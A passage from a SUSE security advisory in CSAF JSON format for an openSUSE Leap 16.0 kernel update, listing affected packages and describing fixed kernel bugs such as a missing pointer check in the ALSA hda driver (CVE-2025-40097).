"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-40045"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
